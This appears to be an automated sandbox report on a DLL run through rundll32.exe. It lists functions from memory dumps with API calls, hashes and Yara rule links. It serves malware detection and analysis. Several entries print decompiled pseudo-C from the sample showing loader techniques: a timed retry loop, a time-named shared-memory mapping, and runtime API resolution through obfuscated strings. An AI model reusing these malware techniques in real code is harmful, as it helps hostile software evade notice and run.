Opcode ID: 65daf1475057c036405d936e95806a8598965a469124cf7f5f1703d4165e6d75
Instruction ID: 0b4f0d3992dac66cebda40b9651f50a4ff68908df7e418c9d3e282059d06460c
Opcode Fuzzy Hash: 65daf1475057c036405d936e95806a8598965a469124cf7f5f1703d4165e6d75
Instruction Fuzzy Hash: 85C1047190021A9BDB60DFA4CC50BEE73BAFF65704F2045AAD819D7180FB319AC8EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CAE6D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E1CAEFD

Strings

pow, xrefs: 6E1CAED5, 6E1CAEF2

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 3fc0550d98fe204db2bc6543187e1fe56d152fee132fe4f09c23f10ac71cec07
Instruction ID: e359c573bc0cf9da538cc5f5c2c92d3f17efc07f75a5fee2beeb247947ad61ea
Opcode Fuzzy Hash: 3fc0550d98fe204db2bc6543187e1fe56d152fee132fe4f09c23f10ac71cec07
Instruction Fuzzy Hash: C4518DA161C5029ACB03AAD4C97039E37E49BA1F00F708E58E496C619CEB7D48D9F6C7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4804 Parent PID: 6092 rundll32.exeCOMMON

Executed Functions

Function 6E18FB55, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18FB5C
std::locale::_Init.LIBCPMT ref: 6E18FB7D

Part of subcall function 6E1911F3: __EH_prolog3.LIBCMT ref: 6E1911FA
Part of subcall function 6E1911F3: std::_Lockit::_Lockit.LIBCPMT ref: 6E191205
Part of subcall function 6E1911F3: std::locale::_Setgloballocale.LIBCPMT ref: 6E191220
Part of subcall function 6E1911F3: _Yarn.LIBCPMT ref: 6E191236
Part of subcall function 6E1911F3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E191276

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: ee959b77c37350282e1fea506bcce25bb3abf05dd4ca9061965ea583c2a7414d
Instruction ID: 09987e9762f7f90e9a188363d40d714d3fa9c6d58b2f85fbe32e05a0ac100dca
Opcode Fuzzy Hash: ee959b77c37350282e1fea506bcce25bb3abf05dd4ca9061965ea583c2a7414d
Instruction Fuzzy Hash: BCE0DF36A11A115BD211ABECA4213ADB6997F88B24F710409E521AF680CFB18DC0BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D16BE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E1D16FF

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3a95ff3f2b4926f66483811f5c5ace3b1c3ee5431b7afa0078749c5059debb66
Instruction ID: 83a5510ecc080a0dbb65f974bdeecef91a58e63cee46ebc0fa59ab773b43f5d0
Opcode Fuzzy Hash: 3a95ff3f2b4926f66483811f5c5ace3b1c3ee5431b7afa0078749c5059debb66
Instruction Fuzzy Hash: 92F024363046355BEB518BEA8814E8B376DAB52670B258511EE24D7090CB60D9CCB6A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1DF679, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF712
GetLocaleInfoW.KERNEL32(?,20001004,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF73B
GetACP.KERNEL32(?,?,6E1DF997,?,00000000), ref: 6E1DF750

Strings

ACP, xrefs: 6E1DF697
OCP, xrefs: 6E1DF6CD

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction ID: cce3889d74054d3dde4e500e9e911cf9744d65b122a1351814f7a9dfa2310df5
Opcode Fuzzy Hash: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction Fuzzy Hash: 7D21C432A54101AAE7608FE5C944AC773B6EF68B60B728414E935D7218E732DFC5E350

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DEECF, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

GetACP.KERNEL32(?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E1DEF90
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?), ref: 6E1DEFBB
_wcschr.LIBVCRUNTIME ref: 6E1DF04F
_wcschr.LIBVCRUNTIME ref: 6E1DF05D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E1DF11E

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: a9efe12d38f729ee6cf2a641c510ec0bba6a5bc7963a2eb31b1903f59f4bc452
Instruction ID: fcc2f03058cd77943056eb03dccd44505359c51f4753464fde7a78b7267f4403
Opcode Fuzzy Hash: a9efe12d38f729ee6cf2a641c510ec0bba6a5bc7963a2eb31b1903f59f4bc452
Instruction Fuzzy Hash: 3F711A32A10206AAE714DFF5CC45AEBB3BCEF58705F204469E525D7180EB71EAC8E761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF84E, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7AB
Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E1DF95A
IsValidCodePage.KERNEL32(00000000), ref: 6E1DF9A3
IsValidLocale.KERNEL32(?,00000001), ref: 6E1DF9B2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E1DF9FA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E1DFA19

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 14b873b596f7f4f6ab4860575478a30056eae2239245cdc0ec7319b0eb090925
Instruction ID: 8909db9d014c77ecd0a065871c5c95f97eba3c3e4ab4e7b99410db9c056447bc
Opcode Fuzzy Hash: 14b873b596f7f4f6ab4860575478a30056eae2239245cdc0ec7319b0eb090925
Instruction Fuzzy Hash: 85515E71D0060AAAEF44DFE5CC44AAE77B9AF19704F204429A921EB150E7709A89EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A72B0, Relevance: 28.8, APIs: 19, Instructions: 287COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A72B7

Part of subcall function 6E183233: __EH_prolog3_GS.LIBCMT ref: 6E18323A

__Getcoll.LIBCPMT ref: 6E1A7306
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A731A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A732F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A736D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7380
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73C6
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A73FA
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7457
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74B5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74C8
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A74E5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A7502
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A751F
numpunct.LIBCPMT ref: 6E1A755E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A756E
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75B2
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75C5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E1A75E2

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollH_prolog3H_prolog3_numpunct
String ID:
API String ID: 1787807339-0
Opcode ID: a8803060f3d3b45dedde8940ba510f5309266091370e387b2cc7e8a9b24b2a5a
Instruction ID: 84ae787f9ff0a5ff380b8b51d200b6eba5664968edfdeba59b2c63ad47966137
Opcode Fuzzy Hash: a8803060f3d3b45dedde8940ba510f5309266091370e387b2cc7e8a9b24b2a5a
Instruction Fuzzy Hash: CA91EAB5D04311ABD710DBF98851AFF7BACEF41254F11486DED18BB280DB318AD4B6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DD508, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E1DD54C

Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD842
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD854
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD866
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD878
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD88A
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD89C
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8AE
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8C0
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8D2
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8E4
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD8F6
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD908
Part of subcall function 6E1DD825: _free.LIBCMT ref: 6E1DD91A

_free.LIBCMT ref: 6E1DD541

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF,?,?,?,6E1E9B2C), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DD563
_free.LIBCMT ref: 6E1DD578
_free.LIBCMT ref: 6E1DD583
_free.LIBCMT ref: 6E1DD5A5
_free.LIBCMT ref: 6E1DD5B8
_free.LIBCMT ref: 6E1DD5C6
_free.LIBCMT ref: 6E1DD5D1
_free.LIBCMT ref: 6E1DD609
_free.LIBCMT ref: 6E1DD610
_free.LIBCMT ref: 6E1DD62D
_free.LIBCMT ref: 6E1DD645

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: a6ca9a775ce20dd2ec9c2a3eb36a4f1a1bf50207fac878929574819db24c4036
Instruction ID: ed384918be04345ea7fd07833a854b2df2e40a7c4904b23ae768b1ab89107797
Opcode Fuzzy Hash: a6ca9a775ce20dd2ec9c2a3eb36a4f1a1bf50207fac878929574819db24c4036
Instruction Fuzzy Hash: 95314E71608605AFEB618AF8D840B8673F8FF10318F204A1AE069D7151EF75E9C8EF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D748A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 6E1D7712

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 236c0a8b4930ade798048a1d80d186b2e7559d327c53fc3bb443f3c059ab8427
Instruction ID: c408524eb839dbce3bacbda85d8342d76dbbf3dc9bc9cca2dc85c5dacf4e751e
Opcode Fuzzy Hash: 236c0a8b4930ade798048a1d80d186b2e7559d327c53fc3bb443f3c059ab8427
Instruction Fuzzy Hash: C8C114B0A046459FDF01CFECC894BADBBB5AF2A314F10495AE910AB3C1D77099C9DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E16163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E16163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t26;
				long _t30;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E161850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_v8 = E6E1618F4(0, _t51);
					Sleep(_t51 << 5);
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E1612DC(E6E16135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E161538(_t44,  &_a4) != 0) {
					 *0x6e164138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t48 =  *_t55(_t43, 0, 0);
				if(_t48 == 0) {
					L9:
					 *0x6e164138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E161DE1(_t48 + _t14);
				 *0x6e164138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48);
				E6E161DFC(_t43);
				goto L11;
			}

APIs

Part of subcall function 6E161850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E16164B,74B063F0), ref: 6E16185F
Part of subcall function 6E161850: GetVersion.KERNEL32 ref: 6E16186E
Part of subcall function 6E161850: GetCurrentProcessId.KERNEL32 ref: 6E161885
Part of subcall function 6E161850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E16189E

GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E16165D
SwitchToThread.KERNEL32 ref: 6E161663

Part of subcall function 6E1618F4: VirtualAlloc.KERNEL32(00000000,6E16167D,00003000,00000004,?,?,6E16167D,00000000), ref: 6E16194A
Part of subcall function 6E1618F4: memcpy.NTDLL(?,?,6E16167D,?,?,6E16167D,00000000), ref: 6E1619DC
Part of subcall function 6E1618F4: VirtualFree.KERNEL32(?,00000000,00008000,?,?,6E16167D,00000000), ref: 6E1619F7

Sleep.KERNEL32(00000000,00000000), ref: 6E161684
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1616B9
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1616D7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E16170F
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E161721
CloseHandle.KERNEL32(00000000), ref: 6E161728
GetLastError.KERNEL32(?,00000000), ref: 6E161730
GetLastError.KERNEL32 ref: 6E16173D

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: cd5e3699f20078545631e13a15946386aaf53ce0b8124ec2edba23a0c3c6810b
Instruction ID: 3a5ddf104a9721e7eab36ea7c410687a25f59367c94bbdb76d8434a4d1ea70b3
Opcode Fuzzy Hash: cd5e3699f20078545631e13a15946386aaf53ce0b8124ec2edba23a0c3c6810b
Instruction Fuzzy Hash: 1D31E376A04614AFCF40DBE5CC889AF77BDEF86364B214516E918D3140E730DAA9FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E16102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E16102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E162100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e164150;
				_push(_t15 + 0x6e16505e);
				_push(_t15 + 0x6e165054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E1620FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6e164140, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E16103C
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E161052
_snwprintf.NTDLL ref: 6E161077
CreateFileMappingW.KERNEL32(000000FF,6E164140,00000004,00000000,?,?), ref: 6E16109C
GetLastError.KERNEL32 ref: 6E1610B3
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1610C7
GetLastError.KERNEL32 ref: 6E1610DF
CloseHandle.KERNEL32(00000000), ref: 6E1610E8
GetLastError.KERNEL32 ref: 6E1610F0

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 1bd2b826855c916d4dce7ecc5fb453ca6913ea0b5443c2923f4b96b49c66b763
Instruction ID: 95e8162c9e3d867cb67678e4b8d0fa62587c351551407cb09c2eef8ce286e97f
Opcode Fuzzy Hash: 1bd2b826855c916d4dce7ecc5fb453ca6913ea0b5443c2923f4b96b49c66b763
Instruction Fuzzy Hash: 9C21C472600108BFDF40AFE9CC88EEE77B9EB95354F218025FA19D7140D6309999AB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D0E20, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

_free.LIBCMT ref: 6E1D112D
_free.LIBCMT ref: 6E1D1146
_free.LIBCMT ref: 6E1D1184
_free.LIBCMT ref: 6E1D118D
_free.LIBCMT ref: 6E1D1199

Strings

C, xrefs: 6E1D0F7C

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 1fc6fc801d4180f226688e5f62a592f00ec2f1784f701319e38116b0fc1bad00
Instruction ID: ddd3a354dbda9d5acd840038cd448aea3d1637a931d96cd5816d24d6bd7ddb40
Opcode Fuzzy Hash: 1fc6fc801d4180f226688e5f62a592f00ec2f1784f701319e38116b0fc1bad00
Instruction Fuzzy Hash: 56C16C75A0121A9FDB24DFA8C894B9DB7B5FF18304F2045AAD809A7350E731AEC8DF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DE2D8, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DDFC3: _free.LIBCMT ref: 6E1DDFE8

_free.LIBCMT ref: 6E1DE326

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF,?,?,?,6E1E9B2C), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DE331
_free.LIBCMT ref: 6E1DE33C
_free.LIBCMT ref: 6E1DE390
_free.LIBCMT ref: 6E1DE39B
_free.LIBCMT ref: 6E1DE3A6
_free.LIBCMT ref: 6E1DE3B1

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 912b46eab0507c6c6ffd1b7527db95e6eb8889e25de1b3c3b0ec4da8d4051ffc
Instruction ID: 8d985f29430bbb847fd5d4d980815587a6152d15b3079a6d425be003bdb9ba02
Opcode Fuzzy Hash: 912b46eab0507c6c6ffd1b7527db95e6eb8889e25de1b3c3b0ec4da8d4051ffc
Instruction Fuzzy Hash: ED115E71A44B04BAD620EBF4CC85FCBB7ECAF0074CF400D16A299A6091EB75B59DAE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D53C9, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(6E1C3E83,00000000,?), ref: 6E1D5411
__fassign.LIBCMT ref: 6E1D55F0
__fassign.LIBCMT ref: 6E1D560D
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5655
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E1D5695
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5741

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 002bbcf89a07c0658d6412921047f9380119a87a7ad47a8049404d36c277d61c
Instruction ID: 5e5911a02bd67ebea16ac4180e6ddf3bb91ad46e4180775bd0cf9632d6113777
Opcode Fuzzy Hash: 002bbcf89a07c0658d6412921047f9380119a87a7ad47a8049404d36c277d61c
Instruction Fuzzy Hash: 5BD1A971D00259DFDB11CFE8C8909EDBBB6FF49314F24415AE855BB241E730AA8ADB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E161A0F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E161DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e164150 + 0x6e165014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E161DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e164150 + 0x6e165189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e164150 + 0x6e16519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E161EB5(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6E161DE1: HeapAlloc.KERNEL32(00000000,?,6E161556,00000208,00000000,00000000,?,?,?,6E1616A9,?), ref: 6E161DED

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E161E4D,?,?,?,?,?,00000002,?,6E161401), ref: 6E161A33
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A55
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A6B
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A81
GetProcAddress.KERNEL32(00000000,?), ref: 6E161A97
GetProcAddress.KERNEL32(00000000,?), ref: 6E161AAD

Part of subcall function 6E161EB5: memset.NTDLL ref: 6E161F34

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 8020bb1490d507234a70488505d2f11c8240d51dadd74fd87a24f0bd02f39989
Instruction ID: af1b37070379f5ec4f72957c60e5e920ff8f621d447cc6d0910dd354f1ec3f6e
Opcode Fuzzy Hash: 8020bb1490d507234a70488505d2f11c8240d51dadd74fd87a24f0bd02f39989
